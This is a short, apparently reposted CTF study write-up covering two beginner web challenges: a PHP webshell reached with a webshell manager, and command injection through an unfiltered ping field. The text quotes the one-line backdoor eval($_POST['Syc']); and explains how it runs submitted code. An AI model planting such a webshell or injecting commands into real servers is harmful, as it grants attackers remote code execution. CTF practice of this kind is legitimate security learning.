CTF Study Notes - Knife&Exec

Enterprise 2022-03-23 10:35:35 views: null

1. [Geek Challenge 2019] Knife

1. Topic

insert image description here

2. Problem solving steps

At first glance at the code in the title, the prompt is a kitchen knife, so I use the ant sword to connect it.
insert image description here
The connection is successful
insert image description here
. Return to the home directory and find the flag file.
insert image description here
Find the FLAG
insert image description here

3. Summary
  1. Learned how to use ant sword and kitchen knife, connect with password
  2. eval($_POST["Syc"]);It is a php one-sentence Trojan horse, in which the eval() function executes the content in the function as code, and $_POST can submit files. Therefore, the kitchen knife can be left as a back door.

2. [ACTF2020 Freshman Competition] Exec

1. Topic
2. Problem solving steps

When I did it myself, I had no clue. I didn't expect it to be so simple, and directly access the file...
insert image description here
insert image description here

3. Summary
  1. The guess is to ping directly without any filtering, so the input command is executed

Guess you like

Origin blog.csdn.net/Obs_cure/article/details/108833402
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com